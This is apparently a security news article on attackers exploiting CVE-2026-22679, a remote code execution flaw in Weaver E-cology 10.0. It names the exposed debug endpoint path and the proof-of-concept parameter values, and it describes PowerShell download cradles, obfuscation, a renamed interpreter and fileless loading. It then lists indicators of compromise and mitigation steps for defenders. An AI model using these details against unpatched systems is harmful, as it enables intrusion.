Threat actors began actively exploiting CVE-2026-22679, a critical, unauthenticated remote code execution (RCE) vulnerability in Weaver (Fanwei) E-cology 10.0, just five days after the vendor released a patch, with the first confirmed intrusion activity detected on March 17, 2026.
CVE-2026-22679 carries a CVSS score of 9.8 (Critical) and affects all Weaver E-cology 10.0 builds before build 20260312. The vulnerability resides in a debug API endpoint left accessible in production environments.
Attackers craft malicious POST requests using attacker-controlled interfaceName and methodName JSON parameters that directly reach the application’s Dubbo RPC invoker with zero authentication and no input validation, ultimately routing input straight to the underlying operating system as arbitrary commands.
The public proof-of-concept exploits the interfaceName: "com.weaver.rpc.InvokeCommand" and methodName: "executeCommand" parameters to achieve host-level command execution. Weaver’s vendor fix, released on March 12, 2026, removes the debug endpoint entirely, closing the attack surface.
Vega Threat Research observed the entire intrusion lifecycle on an internet-reachable Windows host running an unpatched Weaver E-cology build, capturing approximately one week of operator behavior across four distinct phases via EDR telemetry.
Every attacker-controlled process throughout the campaign was parented by java.exe Weaver’s Tomcat-bundled Java Virtual Machine demonstrates command injection at the application layer without prior authentication.
RCE Verification via Ping Callbacks
The first observed activity was not a payload drop but a verification step: java.exe spawned three sequential ping.exe commands pointing to 152.32.173[.]138, a callback IP linked to the Goby attack-surface mapping framework.
Goby’s callback infrastructure uses unique marker tokens in URLs to confirm whether a target successfully executed an injected command, and the same IP and gobygo[.]net domain had previously appeared in February 2026 advisory on Ivanti EPMM exploitation. The process chain java.exe → ping.exe is the definitive host-level indicator of exploitation at this stage.
Three Stagers, Three Quarantines
Over three days, the operator rotated through three PowerShell download cradles targeting two different payload-hosting servers, attempting to land vsgbt.exe and hjchhb.exe from 205.209.116[.]54:2013.
A third stager used a Base64-encoded PowerShell command to download config.js from 161.132.49[.]114, writing it to disk as nvm.exe a filename designed to impersonate Node Version Manager and evade detection. Every Phase 2 payload was intercepted and quarantined by endpoint defenses before execution.
Target-Aware MSI Delivery
After three failed EXE drops, the operator pivoted to a Windows Installer package: fanwei0324.msi, hosted on 141.11.89[.]42. The filename is deliberately crafted fanwei is the romanized Chinese name for Weaver (泛微), and 0324 corresponds to the attack date, indicating the operator maintained organized payload naming by target and date.
Despite successfully launching msiexec.exe, the MSI produced only a single NamedPipeEvent with no child processes and no installer actions, suggesting the package was malformed or incompatible with the target environment.
Renamed PowerShell, Obfuscation, and Fileless Execution
Within hours of the failed MSI, the attacker returned to the original Dubbo RCE primitive and escalated to more advanced evasion techniques. First, java.exe copied the legitimate Microsoft-signed powershell.exe to a file named 2.txt a process-name masquerading technique designed to bypass detections keyed on powershell.exe as a process name.
Next, the operator executed a heavily obfuscated PowerShell command three times, encoding a 576-integer character array and leveraging case randomization (pOwErsHelL, INvoKe-eXpRESsiOn) alongside PowerShell’s variable-substring evasion to avoid the literal string IEX appearing in logs.
When EDR blocked all three attempts, the operator switched to a clear-text DownloadString cradle routed through the renamed 2.txt interpreter, fetching xx.ps1 then x.ps1 from 132.243.172[.]2 a fileless execution technique that loads and runs the remote script entirely in memory without writing to disk.
Reconnaissance was not a discrete phase whoami, ipconfig, and tasklist were executed java.exe throughout all attack phases starting March 19. Because the dubboApi/debug/method endpoint reflects the command stdout/stderr directly in the HTTP response body, the attacker never required a persistent shell.
The debug endpoint itself functioned as an interactive command interface: each POST request executed a discovery command and returned the output synchronously, enabling reconnaissance and payload delivery to run concurrently.
| IP Address | Role |
|---|---|
205.209.116[.]54 | EXE payload hosting (vsgbt.exe, hjchhb.exe) |
161.132.49[.]114 | Payload hosting (config.js / nvm.exe) |
141.11.89[.]42 | MSI hosting (fanwei0324.msi) |
132.243.172[.]2 | PowerShell script hosting (xx.ps1, x.ps1) |
152.32.173[.]138 | Goby callback infrastructure |
Key file hash: fanwei0324.msi SHA256: 147ac3f24b2b63544d65070007888195a98d30e380f2d480edffb3f07a78377f
Malicious filenames to monitor: vsgbt.exe, hjchhb.exe, nvm.exe, fanwei0324.msi, 2.txt (renamed powershell.exe), xx.ps1, x.ps1
Mitigation
Organizations running Weaver E-cology 10.0 should immediately upgrade to build 20260312 or later, which removes the vulnerable debug endpoint entirely.
Security teams should hunt for the process chain java.exe → cmd.exe, java.exe → ping.exe, or java.exe → powershell.exe in EDR telemetry, as all confirmed attacker activity in this campaign originated from the JVM process.
Network defenders should block the five attacker-controlled IP addresses listed above and monitor for DownloadString and IEX activity originating from renamed PowerShell binaries.
FAQ
What is CVE-2026-22679?
It is a CVSS 9.8 unauthenticated RCE vulnerability in Weaver E-cology 10.0 that allows attackers to execute OS commands via an exposed Dubbo debug API endpoint with no authentication required.
Which versions of Weaver E-cology are affected?
All Weaver E-cology 10.0 builds released before March 12, 2026 (build 20260312) are vulnerable and must be patched immediately.
How were attackers exploiting this vulnerability in the wild?
Threat actors used the exposed /papi/esearch/data/devops/dubboApi/debug/method endpoint to inject commands via interfaceName and methodName parameters, deploying PowerShell cradles, MSI payloads, and fileless script loaders through the Weaver JVM.
How can organizations detect active exploitation of CVE-2026-22679?
Security teams should look for java.exe spawning ping.exe, powershell.exe, or cmd.exe in EDR logs, and block the confirmed attacker IPs while monitoring for reconnaissance commands like whoami, ipconfig, and tasklist originating from the Weaver process.
Site: thecybrdef.com
For more insights and updates, follow us on Google News, Twitter, and LinkedIn.
About the Author
